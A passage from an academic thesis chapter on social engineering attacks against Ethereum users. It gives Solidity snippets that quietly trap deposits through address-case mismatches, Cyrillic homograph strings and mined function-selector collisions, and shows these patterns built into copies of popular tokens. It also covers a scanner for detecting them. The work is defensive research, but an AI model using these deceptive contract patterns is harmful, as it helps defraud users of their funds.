address of the future smart contract has the status of a legitimate EOA. Recall from Section 2.2
that a smart contract address is generated from the address of the deploying EOA and the
transaction tally of this EOA.
    Fig. 2.3 illustrates the workflow of attack A2. Smart contract A is disguised as a fair for-profit
scheme, in which the owner charges a fee per fund withdrawal. The fee recipient address is
hard-coded in the smart contract and set as a constant, which fuels the confirmation bias supporting
the notion of permanence of this address. For normal operation, this address should accept incoming
funds, which means that it should either be an EOA or a smart contract with a payable fallback
function. When the user makes a deposit, an event is emitted, which is intercepted by a server
belonging to the attacker (the owner of smart contract A). Upon detecting the event, the
attacker deploys smart contract B at the address Af. The fee collector address Af is crafted such
that the attacker knows the private key of the account Ad from which contract B is deployed,
i.e., Af = χ(Ad, η) (see Section 2.2). The fee transfer to address Af
now fails because smart contract B has no payable fallback function. As a result, the previously
deposited funds remain in the contract for subsequent acquisition by the attacker.
                                    Figure 2.3: Attack A2 workflow.
Attack A3: The attack leverages the overlap between lower-case and mixed-case EIP-55 addresses
to misguide users into locking their funds in the smart contract for subsequent acquisition
by the attacker. In attack A3, the attacker provides the user with a personal smart contract and
seemingly random test Ethereum accounts. When a smart contract has hard-coded addresses
or other account-specific values, it is a common practice to provide users with test accounts to
demonstrate the functionality of the smart contract [55]. Since all accounts are assumed to have the
same set of properties, the user believes that any account will behave in the same way as the test
accounts, which we found is not always true. Essentially, attack A3 exploits M4, i.e., the belief
that the secrecy of the private key solely determines the security of an Ethereum account. The key
to this attack is the generation of accounts whose EIP-55 checksums are all lowercase. Using a
random guessing approach, we verify that the probability of generating an EIP-55 address with an
all-lowercase checksum is about 0.0246%.
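The measured frequency can be cross-checked with a back-of-the-envelope estimate. The sketch below rests on two assumptions that are not stated in the text: the 40 hexadecimal digits of an address are uniformly distributed, and EIP-55 capitalizes a letter digit (a to f) with probability 1/2, depending on the corresponding nibble of the address hash. Under these assumptions, a single digit is left without an uppercase letter with probability 1 - (6/16)(1/2) = 13/16, so the estimate for a whole address is (13/16)^40, which is close to the value reported above.

```python
from fractions import Fraction

ADDRESS_DIGITS = 40
p_letter = Fraction(6, 16)   # digit is one of a-f (assumed uniform digits)
p_upper = Fraction(1, 2)     # EIP-55 uppercases that letter (assumed uniform hash nibble)

# A digit stays "lowercase" if it is a numeral or a letter that is not uppercased.
p_digit_not_upper = 1 - p_letter * p_upper
p_all_lowercase = p_digit_not_upper ** ADDRESS_DIGITS

print(p_digit_not_upper)                          # 13/16
print(f"{float(p_all_lowercase) * 100:.4f}%")     # roughly 0.0247%
print(f"about 1 in {round(1 / float(p_all_lowercase))} random addresses")
```

The estimate also indicates why such accounts are cheap to mine: a few thousand randomly generated key pairs are expected to yield one.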
      One-time-password validation is a common supplemental authorization technique in smart
contracts¹⁰. The smart contract owner can generate an authentication hash of the user address and the
corresponding user password, and store this hash in the smart contract. In this attack, the adversary
creates such a password validation routine in the smart contract and offers the user several test
accounts for verifying its functionality. However, the test set consists only of deliberately mined
accounts with all-lowercase EIP-55 checksums. In this smart contract, the fund transfer function
is preceded by a password validation, which invokes an address conversion function that translates
the address of the transaction sender into an all-lowercase string (e.g., strAddrHash in Fig. 2.4).
   ¹⁰ Sample password-based authorization can be found in these contracts:
      0x0f82C7EAb8F7efB577A2DE9d2B7e1Da1d0b6870e and 0x13407d93F343148bf03eaCf482441dD526cD7EbD.

// Keccak256 digest of the user address concatenated with the password.
bytes32 constant authHash =
   0x8e69860da968defb8d06a7e565e5d76e3e878a01473a0cb191a0eda120323ca5;
// Hash the string form of the address (produced by addr2Str) together with the password.
function strAddrHash(address _addr, string memory _pass) private pure returns (bytes32) {
   return keccak256(abi.encodePacked(addr2Str(_addr), _pass));
}
function sellTokens(uint256 amount, string memory password) public {
   // Tokens are sold only if the sender's address and password match authHash.
   if (strAddrHash(msg.sender, password) == authHash) {
       _burn(_msgSender(), amount);
       address(msg.sender).transfer(SafeMath.mul(amount, tokenPrice));
   }
}
                   Figure 2.4: Code snippet from function sellTokens in A3 attack.
Using the test accounts, the smart contract works as expected. After the testing, the user creates
a production authentication hash by concatenating their public address (copied from the wallet)
and a secret password. This production account cannot be tested without revealing the password
through the open network of the public blockchain. Unexpectedly, an attempt to withdraw the funds
fails because the password validation fails due to the disparity in the address capitalization.
    Fig. 2.4 demonstrates an example of attack A3. The authHash constant stores the
Keccak256 digest of the user address 0xe6c700856796524501438d7197497c14bceac297 concatenated
with the password ASIACCS2021. The attacker offers the user the private keys of several test
accounts whose public addresses have all-lowercase EIP-55 checksums. These test accounts work
as expected. But when users initiate transactions with their real addresses, the password
validation fails, since authHash incorporates the address with a mixed-case checksum, while
strAddrHash generates the hash using the same address in all lowercase. This failed
validation prevents the user from selling tokens. This attack demonstrates that some accounts
can be more vulnerable than others, effectively refuting misconception M4.
2.4.2: Homograph Visual Cognitive Deception
The homograph attacks in smart contracts are enabled by the existence of symbols that look identical
or very similar, whereas most text editors (except hex viewers) are unable to reveal the difference.
We surveyed security experts from seven smart contract auditing firms (listed in Section 2.6.5)
about the usage frequency of hex viewers in their auditing process. The survey results show that
only 1 out of 7 companies usually uses hex viewers, 2 use them sometimes, while
the rest never or rarely use them. Here, we define two words or letters that contain
identical-looking symbols with different codes as a pair of homograph twins. The Homograph class of
social engineering attacks leverages the fact that, although Solidity prohibits Unicode symbols in
the names of functions and variables, it allows these symbols to appear in string literals that
determine branching and inter-contract calls. In this section, we introduce three Homograph attacks:
A4, A5, and A6.
if (stringsEqual(symbol(), "BT")) {
     _burn(_msgSender(), amount);
     address(msg.sender).transfer(SafeMath.mul(amount, tokenPrice));
}
                       Figure 2.5: A snippet of the sellTokens function in A4 attack.
Attack A4: The attack leverages homograph twins in a string matching pattern to craft a malicious
smart contract. Specifically, the attacker crafts a smart contract in which a homograph string is used
in a branching condition, which leads to unexpected code execution.
      Fig. 2.5 demonstrates attack A4, with the attack code embedded in the sellTokens() function.
The stringsEqual() function performs string matching by comparing the hashes of two strings¹¹.
The literal BT is made of two ASCII characters, but the symbol() return value, although visually
identical to the literal BT, has the symbol T substituted with its homograph twin from the Cyrillic
symbol set. Since the value of symbol() is mutable, the smart contract does not contain any
explicitly malicious code; however, it turns malicious when the token symbol value is changed. As a
result, the branching condition evaluates to false and the sale of tokens never occurs, which
demonstrates the importance of the token symbol and thus refutes misconception M5.
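The mismatch is invisible on screen but obvious at the byte level, which is what a hex viewer would reveal. The following Python sketch illustrates this with the two-letter symbol from Fig. 2.5. The helper name non_ascii_symbols is hypothetical, and the choice of U+0422 as the Cyrillic twin of T is an assumption made for illustration.

```python
import unicodedata


def non_ascii_symbols(text: str):
    """Return (index, symbol, Unicode name) for every non-ASCII symbol in text."""
    return [(i, ch, unicodedata.name(ch, "UNKNOWN"))
            for i, ch in enumerate(text) if ord(ch) > 127]


ascii_symbol = "BT"          # two ASCII characters
twin_symbol = "B\u0422"      # assumed twin: Cyrillic capital letter Te

print(ascii_symbol == twin_symbol)            # False
print(ascii_symbol.encode("utf-8").hex())     # 4254
print(twin_symbol.encode("utf-8").hex())      # 42d0a2
print(non_ascii_symbols(twin_symbol))
```

Because a hash is computed over these bytes, any hash-based comparison of the two strings reports them as different, even though they render identically in most fonts.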
Attack A5: This attack replaces the header of a function with its homograph twin to cause
unexpected inter-contract call failures. Code reuse has been one of the best practices of smart
contract development, as it reduces implementation time and the frequency of programming errors. Code
reuse can be either static or dynamic. A typical example of static code reuse is inheriting classes
from the OpenZeppelin Contracts library. EVM also supports dynamic code reuse, in which one
smart contract calls functions of another contract deployed on the same blockchain. Dynamic code
reuse reduces the utilization of blockchain storage and achieves native inter-contract
communication (ICC). It is known that if a function is specified incorrectly in an ICC call, the
fallback function¹² of the smart contract will be invoked instead [57]. However, if the fallback
function is absent, the call to a non-existent function triggers an EVM exception with subsequent
transaction reversal, which attack A5 exploits by falsifying the function selector of an ICC call.
   ¹¹ Solidity does not have any embedded or library string matching function. As the Keccak256 digest is an EVM
      opcode function with relatively low gas cost, comparing string hashes is the de facto standard string
      comparison approach.
                                        Figure 2.6: Attack A5 workflow.
      Fig. 2.6 demonstrates the general idea of attack A5 . During an ICC call, when an expected
function in the destination smart contract is not found, and with no fallback routine implemented,
the call will unexpectedly fail, and the transfer of funds to the client will not be executed. The
proposed A5 attack substitutes one or several letters in the function header string with homograph
twins, and as a result, the generated function selector will not match any existing function, leading
to the ICC call failure.
      Fig. 2.7 shows the sellTokens function of attack A5. We create and deploy an additional smart
contract called Helper (see Fig. 2.8), whose address is hard-coded in the BaseToken contract. The
Helper smart contract has a log function for event logging. However, the string “log(address)”
contains letters substituted with their homograph twins, and therefore the ICC call fails. Thus,
the subsequent fund transfer to the caller never happens. This example demonstrates that visually
identical arguments of the call() and delegatecall() routines can indeed produce different selectors,
proving the incorrectness of M6.
   ¹² In Ethereum smart contracts, the fallback function is an optional nameless function designed to be the default
      interface of a smart contract.
 bytes memory payload = abi.encodeWithSignature("log(address)", msg.sender);
 // call() returns a status flag and the returned data; only the status is needed here.
 (bool success, ) = address(helperAddress).call(payload);
 if (success) {
    _burn(_msgSender(), amount);
    address(msg.sender).transfer(SafeMath.mul(amount, tokenPrice));
 }
                          Figure 2.7: Code snippet from function sellTokens in A5.
 mapping(address => uint256) private lastSell;
 function log(address a) public {
    // Only the hard-coded address may record a sale.
    require(msg.sender == 0x0EFb5DE6AddAdDE835CEaadaAB1992590d7588F5);
    lastSell[a] = block.number;
 }
                         Figure 2.8: A code snippet of the Helper contract used in A5.
Attack A6: The previous attack has one major weakness: although nothing in the code looks
suspicious, the status check of the ICC call may prompt a cautious user to set up a test deployment
to check whether the call succeeds or not. Our next attack provides a deceptive technique to pass
such a test. Attack A6 leverages potential collisions of Ethereum function selectors, whose length
is only 32 bits, to ensure a successful status from a deceptive ICC call. Assuming a uniform
distribution of function selectors, the probability of collision with another function (i.e., two
functions have the same selector) is approximately 2.33 × 10^-10. We run an experiment to show that
it takes only a few hours on average for an office computer to find a collision¹³. In attack A6, the
attacker crafts a function whose selector collides with the selector of the homograph twin of the
expected function. Since the called function actually exists, the transaction succeeds, which further
fuels the victim’s confirmation bias in support of the deceptive narrative crafted by the attacker.
    ¹³ Generally, the larger the number of symbols available for homograph substitution in the function header, the
       less time it takes to mine a collision.
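The quoted probability is simply the reciprocal of the size of the 32-bit selector space. The short Python sketch below reproduces it and, under the same uniformity assumption, estimates how many candidate function names a brute-force search would have to try on average to hit one fixed target selector. The geometric-distribution model is a simplification introduced here for illustration; it is not a description of the search tool used in the experiment.

```python
SELECTOR_BITS = 32

# Probability that a uniformly random selector equals one fixed target selector.
p_collision = 1 / 2 ** SELECTOR_BITS

# Trials until the first hit follow a geometric distribution with mean 1/p.
expected_trials = 1 / p_collision

print(f"{p_collision:.3e}")         # 2.328e-10
print(f"{expected_trials:,.0f}")    # 4,294,967,296
```

Roughly four billion hash evaluations is a modest workload, which is consistent with a collision being found within hours on commodity hardware.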

                               Figure 2.9: Workflow in the A6 attack.
    The Solidity compiler will terminate with an error if it encounters two functions with the same
selector in one smart contract. Attack A6 avoids this issue by replacing a function header with
its homograph twin. In the workflow of the attack, presented in Fig. 2.9, smart contract A
implements a call to a function in smart contract B. When B is compiled, the string header of the
function foo is translated into the 32-bit selector 0xc2985578. However, if we substitute both
letters “o” in the string “foo()” with their homograph twins, the modified header is translated
into the selector 0x3293f02a. Now, the attacker uses a collision search algorithm
to mine the function name bar821770037, whose selector is also 0x3293f02a. As a result, foo
and bar821770037 can coexist in contract B, even though both are addressed by a visually identical
delegatecall argument, i.e., "foo()" (see Fig. 2.9), effectively refuting M7. After
the homograph substitution, unbeknownst to the user, bar821770037 will be called instead of foo,
which will return a successful status but break the anticipated code logic in contract A.
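To see why a visually identical header yields a different selector, recall that a selector is the first four bytes of the Keccak256 digest of the header’s bytes. Python’s standard hashlib offers only the standardized SHA-3 variant, whose padding differs from the original Keccak used by Ethereum, so the sketch below carries a compact pure-Python Keccak-256 written after the public reference design. All helper names are hypothetical, and Cyrillic о (U+043E) is assumed as the homograph twin, since the text does not name the substituted code point.

```python
MASK64 = (1 << 64) - 1


def _rol64(value: int, shift: int) -> int:
    """Rotate a 64-bit lane to the left."""
    shift %= 64
    return ((value << shift) | (value >> (64 - shift))) & MASK64


def _keccak_f1600(state: bytearray) -> bytearray:
    """Apply the 24-round Keccak-f[1600] permutation to a 200-byte state."""
    lanes = [[int.from_bytes(state[8 * (x + 5 * y): 8 * (x + 5 * y) + 8], "little")
              for y in range(5)] for x in range(5)]
    lfsr = 1
    for _ in range(24):
        # theta: mix each column with the parity of two neighboring columns
        c = [lanes[x][0] ^ lanes[x][1] ^ lanes[x][2] ^ lanes[x][3] ^ lanes[x][4]
             for x in range(5)]
        d = [c[(x + 4) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [[lanes[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        # rho and pi: rotate lanes and move them to new positions
        x, y = 1, 0
        current = lanes[x][y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x][y] = lanes[x][y], _rol64(current, (t + 1) * (t + 2) // 2)
        # chi: non-linear step applied row by row
        for y in range(5):
            row = [lanes[x][y] for x in range(5)]
            for x in range(5):
                lanes[x][y] = row[x] ^ (~row[(x + 1) % 5] & row[(x + 2) % 5])
        # iota: inject the round constant, generated by an 8-bit LFSR
        for j in range(7):
            lfsr = ((lfsr << 1) ^ ((lfsr >> 7) * 0x71)) % 256
            if lfsr & 2:
                lanes[0][0] ^= 1 << ((1 << j) - 1)
    out = bytearray(200)
    for x in range(5):
        for y in range(5):
            out[8 * (x + 5 * y): 8 * (x + 5 * y) + 8] = lanes[x][y].to_bytes(8, "little")
    return out


def keccak256(data: bytes) -> bytes:
    """Original Keccak-256 (padding byte 0x01), as used by Ethereum."""
    rate = 136  # bytes absorbed per permutation for a 256-bit digest
    padded = bytearray(data) + bytes(rate - len(data) % rate)
    padded[len(data)] ^= 0x01   # SHA-3 would use 0x06 here
    padded[-1] ^= 0x80
    state = bytearray(200)
    for offset in range(0, len(padded), rate):
        for i in range(rate):
            state[i] ^= padded[offset + i]
        state = _keccak_f1600(state)
    return bytes(state[:32])


def selector(header: str) -> str:
    """First four bytes of the Keccak256 digest of the UTF-8 encoded header."""
    return keccak256(header.encode("utf-8"))[:4].hex()


print(selector("foo()"))              # c2985578, the value quoted in the text
print(selector("f\u043e\u043e()"))    # twin header: a different selector
```

The second header prints exactly like the first in most fonts, yet its UTF-8 bytes differ, so its digest and therefore its selector differ as well.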
    Figs. 2.10 and 2.11 demonstrate an example of the A6 attack. The Helper smart contract
includes two functions, accountRegistered and afterBlock29410106. Since block number checks
are common in Ethereum smart contracts¹⁴, the presence of an auxiliary function with this name
is unlikely to raise any suspicion. The string “accountRegistered(address)” (Fig. 2.10)
contains Cyrillic letters (letters 1, 2, 3, and 16 are replaced). We use a brute-force algorithm to
mine the name afterBlock29410106, whose function selector collides with that of a homograph twin of
“accountRegistered(address)”. Surprisingly, we discover that the functions afterBlock29410106
and accountRegistered can accept arguments of different types: the call will still succeed
regardless of the argument types, as long as the number of arguments in the two functions is
consistent. This undocumented behavior of EVM adds an additional layer of disguise to the attack. In
the end, afterBlock29410106 is called instead of the expected function accountRegistered. Unlike
in attack A5, the success variable is now true. However, the user’s fund transfer does not happen
despite the successful return status, as the function’s return value is not as expected.
   ¹⁴ For example, contract 0xb68c88283b558cdc38c75c07bbc0d6921ef40fc7 uses a block number check to
      determine the contract initialization deadline.
 bytes memory payload = abi.encodeWithSignature("accountRegistered(address)", msg.sender);
 (bool success, bytes memory result) = address(helperAddress).delegatecall(payload);
 require(success);
 if (abi.decode(result, (bool)) == true) {
      _burn(_msgSender(), amount);
      address(msg.sender).transfer(SafeMath.mul(amount, tokenPrice));
 }
                        Figure 2.10: Code snippet from function sellTokens in A6.
 function afterBlock29410106(bool deadlineCheck)
      public view returns (bool) {
      if (block.number > 29410106 && deadlineCheck) {
         return true;
      }
      return false;
 }
 function accountRegistered(address a) public pure returns (bool) {
      return a == mainAccount || a == backupAccount;
 }
                     Figure 2.11: A snippet of the Helper contract used in A6 attack.

Table 2.2: Five popular tokens into which we successfully integrate social engineering attack patterns.

Smart Contract        Market Capitalization†   Integrated Attack Pattern
                      (× $1 billion)
--------------------  -----------------------  -------------------------
Tether USD (USDT)     19.76                    A4
Binance (BNB)         4.6                      A5
ChainLink (LINK)      3.94                     A1
Bitfinex (LEO)        1.32                     A6
CryptoKitties (CK)    -                        A1 + A2

† Approximate rounded averages as of early December 2020.
2.5: Case Study of Real-world Smart Contracts
One of the most important questions of this work is whether the six social engineering attacks can be
used in real-world smart contracts. To answer this question, we choose the source code of five smart
contracts that meet the following criteria: a) they represent a popular use case of a smart contract;
b) they have thousands of active users; c) they have high market capitalization (i.e., users entrust
their funds to them); d) the contracts implement one of the standard use cases from the OpenZeppelin
Contracts library. Then, we slightly modify the source code of these contracts to integrate the
social engineering attacks into them without altering any functionality or incorporating any unsafe
practices or known vulnerabilities. This way we demonstrate that popular trusted smart contracts
are capable of delivering the social engineering attacks.
    After integrating the attack patterns into the source code of the five contracts, we deploy the
contracts on the Ropsten testnet and validate their expected functionality. Then, we simulate the
production deployment of the contracts and demonstrate that some transactions that worked during
testing fail due to the activation of the attack functionality (e.g., deployment of a contract at an
EOA address in attack A2). For each case, we make sure that: a) the attacks remain dormant
during the test stage and activate only in a production deployment; b) the attacks visually conceal
themselves from the auditor; and c) each attack has a rational disguise (e.g., pretending to profit
from charging service fees). Table 2.2 summarizes the five smart contracts and the attack patterns
integrated into them. The video demonstrations of all five cases are available at
https://nick-ivanov.github.io/se-info/. The source code files of the entire smart contract set are
available at https://github.com/nick-ivanov/social-engineering-big5.
Production Deployment Simulation: Our manual analysis of the source code of popular
contracts reveals that most of them use the OpenZeppelin Contracts templates with some custom
additions. In our case study, we demonstrate the feasibility of integrating attack code into an
existing token without breaking the security patterns and functionality delivered by the OpenZeppelin
Contracts library. The manipulated token can be advertised as a new cryptocurrency with additional
features, such as special VIP privileges for early adopters. For ethical reasons, we perform both
testing and production deployment simulation using the Ropsten testnet, whose smart contract
execution is identical to that of the Mainnet but does not involve real funds. To simulate a
production deployment of a malicious contract by an adversary, we deliberately configure the same
contracts with different constructor arguments (e.g., replace a letter of the token symbol with its
homograph twin), or submit additional transactions (e.g., deploy a smart contract at a hard-coded
EOA address). This effectively simulates the activation of previously dormant malicious
functionality in a production deployment.
      Here, we provide a high-level overview of the integration of the five attack patterns.
Integration of A4 pattern in Tether USD Stablecoin: A stablecoin is a fungible token pegged
to the market price of a fiat currency (e.g., U.S. dollar). Adopted mainly by crypto exchanges,
mainstream stablecoins have very high market capitalizations and daily transaction volumes. Tether
USD (USDT), the most popular stablecoin, is an ERC-20 smart contract deployed on Ethereum¹⁵.
We integrate the pattern of attack A4 into the source code of USDT by adding a seemingly harmless
check of the token symbol before each transfer. We test the code by confirming that the transfer
routine’s functionality remains unchanged. After that, we simulate a production deployment of the
code with an invisible modification of the token symbol, which is passed through the constructor.
As a result, the smart contract traps user tokens due to the tampered token symbol.
Integration of A5 pattern in Binance Token: The Binance Token (BNB)¹⁶ is a popular ERC-20
altcoin with a high market capitalization and daily transaction volume, collateralized by the
financial assets of Binance, a large crypto exchange. We integrate the pattern of attack A5 into
the source code of the BNB token by adding an innocent-looking logging routine, which saves
the transfer record in another smart contract. In the test, the code performs logging as expected.
However, in the final deployment, the owner replaces one letter in the ICC header of the logging
function with a homograph twin. The log call then throws an exception, which causes the fund
transfer to users to fail.
   ¹⁵ Deployed at 0xdAC17F958D2ee523a2206206994597C13D831ec7.
   ¹⁶ Deployed at 0xB8c77482e45F1F44dE1745F52C74426C631bDD52.
Integration of A1 pattern in ChainLink Token: A blockchain oracle is a service that delivers
reliable outside information into the context of a smart contract. Collateralized by its business
assets, ChainLink issues an ERC-20 token with the symbol LINK¹⁷, into the source code of which we
integrate the pattern of attack A1. In this token, we use a special user role, the VIP user, who can
transfer funds at any time, whilst the remaining users can only transfer funds after a pre-determined
deadline. The test run does not reveal any issues, but in the production deployment, the malicious
smart contract owner mines a similar public address with the same EIP-55 checksum as that of the
legitimate VIP user address, and saves this address in the smart contract. As a result, the VIP user,
who does not recognize the address falsification, fails to transfer funds from the smart contract.
Integration of A6 pattern in Bitfinex Token: The Bitfinex LEO token, also known as
UNUS SED LEO¹⁸, is backed by the assets of the Bitfinex crypto exchange. In this token, the attacker
uses an auxiliary helper smart contract for purported protection against transfer floods (i.e., one
user performing too many small transfers). The token contract uses a homograph substitution
in the ICC header of the expected flood-checking function. Because of this
substitution, a wrong function in the auxiliary smart contract is called, which causes an unexpected
failure of the fund transfer.
Hybrid Social Engineering Attack Pattern Integration in CryptoKitties: The ERC-721 stan-
dard is used for non-fungible (i.e., unique) Ethereum tokens, such as collectibles, games, deeds,
   17
      Deployed at 0x514910771af9ca656af840dff83e8264ecf986ca.
   18
      Deployed at 0x2af5d2ad76741191d15dfe7bf6ac92d4bd912ca3.
etc. The CryptoKitties collectible game is one of the most popular ERC-721 tokens19 . For this
contract, we use a combination of techniques from attacks A1 and A2 . Specifically, the A1 com-
ponent involves a manual change of the fee collector by the attacker. The A2 component deploys
a non-payable smart contract at an EOA address, resulting in transaction reversal. Akin to the
four previous attacks on ERC-20 tokens, this social engineering exploitation also does not reveal
itself during testing: the malicious logic is enabled only in the production environment, when the
owner deploys the non-payable contract.
2.6: Evaluation and Analysis
In this section, we attempt to project the social engineering attacks onto all deployed open source
smart contracts and estimate the overall danger of the attacks.
2.6.1: Methodology
As demonstrated in Sections 2.3 and 2.4, the detection of social engineering attacks is impossible
in a fully-automated manner because human assessment is necessary for understanding semantics
of smart contracts. However, manual detection of social engineering attacks requires a laborious
effort, such as inspecting the source code with a hex viewer, generating ICC selectors, etc. To
address this dichotomy, we develop an automated tool that selects a potential subset of candidates
from a given set of smart contracts for further manual analysis. Using this hybrid approach, we
manage to filter out over 95.4% of all the candidates. Then, we manually inspect each of the
suspected smart contracts and classify them into three categories: non-exploitable, syntactically
matching, and semantically exploitable. Finally, we share our findings with security experts from
seven leading smart contract security firms and ask them to share their opinions about the attacks
in the form of an online survey.
   19
      Deployed at 0x06012c8cf97bead5deae237070f9587f8e7a266d.
2.6.2: Automated Detection
A specific feature of all social engineering attacks is that their deception mechanisms are located
only in the source code, and are therefore undetectable in the bytecode. As a result, we consider the
source code of a smart contract as an input. Fig. 2.12 illustrates the operation of our automated
filter, which uses a double-layer detection, i.e., search for atomic signatures (attack markers) fol-
lowed by logic processing of these signatures to match specific attacks. First, we preprocess the
source codes by parsing multi-file contracts embedded in JSON objects, removing all non-Solidity
smart contracts, erasing all the comments, and discarding smart contracts that are duplicates of the
previously processed ones. Then, we feed the source codes into a set of signature detectors. Each
signature detector utilizes text search and regular expression matching to identify specific markers
in the source codes. For example, a fund transfer routine can be represented in the source code
by any of three markers: a) the transfer routine; b) the send routine; or c) the call with
value procedure. These markers are then combined into a signature for detecting a fund transfer.
Based on the signatures, we generate social engineering attack detection rules in a conjunctive
normal form (CNF) by concatenating a sequence of signatures. We implement the smart contract
scanner using Python, ethereum.utils, and Web3.py, and we publish the source code of the tool at
https://github.com/nick-ivanov/esead.
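The double-layer filter described above can be illustrated with a minimal Python sketch. It is not the code of the published tool: the marker regular expressions, the signature names, and the two example rules are hypothetical and were chosen only to show how atomic markers are OR-ed into signatures and how signatures are AND-ed into a CNF rule.

```python
import re

# Hypothetical atomic markers (regular expressions over comment-free Solidity source).
MARKERS = {
    "transfer_call": re.compile(r"\.transfer\s*\("),
    "send_call": re.compile(r"\.send\s*\("),
    "call_value": re.compile(r"\.call\s*(\.value\s*\(|\{\s*value\s*:)"),
    "address_setter": re.compile(r"function\s+set\w*\s*\(\s*address\b"),
    "hardcoded_address": re.compile(r"0x[0-9a-fA-F]{40}\b"),
}

# A signature is a disjunction (OR) of markers.
SIGNATURES = {
    "fund_transfer": ["transfer_call", "send_call", "call_value"],
    "mutable_recipient": ["address_setter"],
    "fixed_recipient": ["hardcoded_address"],
}

# A rule is a conjunction (AND) of signatures, i.e., a CNF formula over markers.
# The rule names are illustrative and are not the exact attack profiles.
RULES = {
    "address_change_candidate": ["fund_transfer", "mutable_recipient"],
    "hardcoded_recipient_candidate": ["fund_transfer", "fixed_recipient"],
}


def signature_matches(name, source):
    """Return True if at least one marker of the signature occurs in the source."""
    return any(MARKERS[m].search(source) for m in SIGNATURES[name])


def matching_rules(source):
    """Return the sorted names of all rules whose signatures all match."""
    return sorted(
        rule for rule, sigs in RULES.items()
        if all(signature_matches(s, source) for s in sigs)
    )


SAMPLE = """
contract Demo {
    address feeCollector;
    function setCollector(address a) public { feeCollector = a; }
    function withdraw() public {
        payable(feeCollector).transfer(1);
        payable(msg.sender).transfer(address(this).balance);
    }
}
"""

print(matching_rules(SAMPLE))
```

A contract returned by such a filter is only a candidate: as discussed in the methodology, a human still has to decide whether the match is exploitable.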
      It is worth noting that we do not attempt to detect the proposed social engineering attacks using
traditional smart contract vulnerability scanners (e.g., Securify, Sereum, etc.), because these tools
by design assume a threat model in which a smart contract is the attack target. The only publicly
available tool that fits the threat model of the proposed attacks is HoneyBadger20 . However, Hon-
eyBadger is designed to detect Ethereum honeypots — the type of attack excluded from our study
due to its limited audience of targeted victims. Therefore, none of the existing tools is capable of
identifying the proposed social engineering attacks.
   20
      https://github.com/christoftorres/HoneyBadger
Figure 2.12: Automated detection of potential social engineering attacks, in which atomic signa-
tures are combined to match an attack profile for each attack in the form of CNF.
2.6.3: Potentially Exploitable Smart Contracts
Attacks exploiting smart contract code vulnerabilities (e.g., reentrancy or integer overflow) can
be detected via automated analysis of bytecode, source code, or transaction history of a smart contract.
However, this information is insufficient to identify social engineering attacks with satisfactory
certainty. For example, consider transaction
0xc215b9356db58ce05412439f49a842f8a3abe6c1792ff8f2c3ee425c3501023c, through which the sender paid
around $5 million in gas fees: the context of this transaction cannot be known without a testimony
from the sender. Our exhaustive effort to find any existing reports of social engineering attacks in
the wild has not yielded any results beyond the cases of honeypot exploitations. Therefore, until the
emergence of reports from victims,
we can only discuss the potential of the social engineering attacks in the real-world smart contracts.
      To shed light on the potential existence of social engineering attacks in Ethereum, we collect
all available open-source smart contracts from Etherscan21 , 85,656 unique smart contracts in total,
including 73,933 in Mainnet, 8,297 in Ropsten testnet, and 3,426 in Kovan testnet. Table 2.3 shows
the breakdown of the 3,855 detected candidates, which can potentially deliver social engineering
attacks. Then, we perform a manual analysis of all the 3,855 suspicious cases to remove 2,375 non-
exploitable smart contracts, and subdivide the remaining 1,480 contracts into 453 syntactically
matching (but not exploitable) and 1,027 semantically exploitable contracts. An example of a non-
exploitable contract22 would be the one with a suspicious transfer isolated from critical instructions
by a mutually-exclusive if-else branching. Next, we elaborate on how we identify syntactically
matching and semantically exploitable contracts, as well as their implications.
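The counts reported above can be cross-checked with a few lines of Python. The snippet only restates numbers given in the text; the variable names are ours.

```python
# Dataset sizes reported in the text.
dataset = {"Mainnet": 73_933, "Ropsten": 8_297, "Kovan": 3_426}
total_contracts = sum(dataset.values())

candidates = 3_855              # contracts selected by the automated filter
non_exploitable = 2_375         # removed after manual analysis
syntactically_matching = 453
semantically_exploitable = 1_027

# Contracts left after removing the non-exploitable ones.
remaining = candidates - non_exploitable
# Share of the dataset discarded by the automated filter.
filtered_out_share = 1 - candidates / total_contracts
# Share of the candidates that are semantically exploitable.
exploitable_share = semantically_exploitable / candidates

print(f"total contracts: {total_contracts}")
print(f"remaining after manual removal: {remaining}")
print(f"filtered out automatically: {filtered_out_share:.1%}")
print(f"semantically exploitable among candidates: {exploitable_share:.1%}")
```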
   21
      https://etherscan.io/
   22
      For example, 0xa62bf7c97c4270882a9278c6f9d684d30e242e03.
Syntactically Matching Contracts: A syntactically matching smart contract fits the profile of one
of the social engineering attacks (A1 ... A6 ), but does not exhibit a deception capability necessary for
fooling the victim. For example, smart contract 0xe5b288da8fb70cd58ab240f71610576657308762
fits the A2 case because it has a hard-coded fee-collecting EOA address. However, the manual
examination of the smart contract reveals that this address is
0xfeefeefeefeefeefeefeefeefeefeefeefeefeef. Obviously, it is extremely unlikely that someone owns
an account that can deploy a
smart contract at this address.
      Another example of a syntactically matching smart contract is the smart contract called MyMil-
lions23 , in which a fee transfer is sharing the call stack of the same transaction with another transfer,
while the fee address is both pre-initialized and can be changed, which matches both A1 and A2
attacks. However, the manual analysis of this contract reveals that the double transfer occurs in
the function buyFactory, which is an engagement function (i.e., the function that the client calls to
participate in the scheme of the smart contract). If this function fails due to the attack, the client
deposit will never happen, and therefore this attack will not bring any gain for the attacker. Since
semantics of smart contracts vary, only a human can definitively identify engagement and resolution
functions.
Semantically Exploitable Contracts: A semantically exploitable smart contract not only matches
the profile of one of the social engineering attacks, but also has the deception capability, which
means that contracts of this type are actually exploitable. A deception capability is an introspective
measure characterized by a substantial chance for a contract user to misconstrue the logic of the
smart contract, leading to a potential execution of one of the social engineering attacks. The
introspective nature of deception capability requires a human to reason about deceptiveness, leading
us to manually analyze the source code of all 3,855 automatically selected suspected contracts,
which took around 140 person-hours in total.
      As an example of semantic exploitability, our analysis reveals 34 smart contracts where a com-
parison with an empty string literal precedes a critical operation, such as the one shown in Fig. 2.13.
   23
      Deployed at 0xbBbeCd6ee8D2972B4905634177C56ad73F226276.
One way such a contract can be used as a carrier of attack A4 is through the use of a zero-width space
(Unicode U+200B), which appears as an empty string in many popular text editors (e.g., VS Code).
Although none of the suspected 34 contracts have an actual zero-width space, a redeployment of
the same contract can be used to launch the social engineering attack A4 .
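A reviewer can surface such invisible characters mechanically before reading the code. The following Python sketch is an illustration under stated assumptions rather than part of our tool: the helper name, the simplified string-literal pattern, and the list of invisible code points are ours. It also flags any non-ASCII symbol, which covers homograph substitutions inside string literals.

```python
import re
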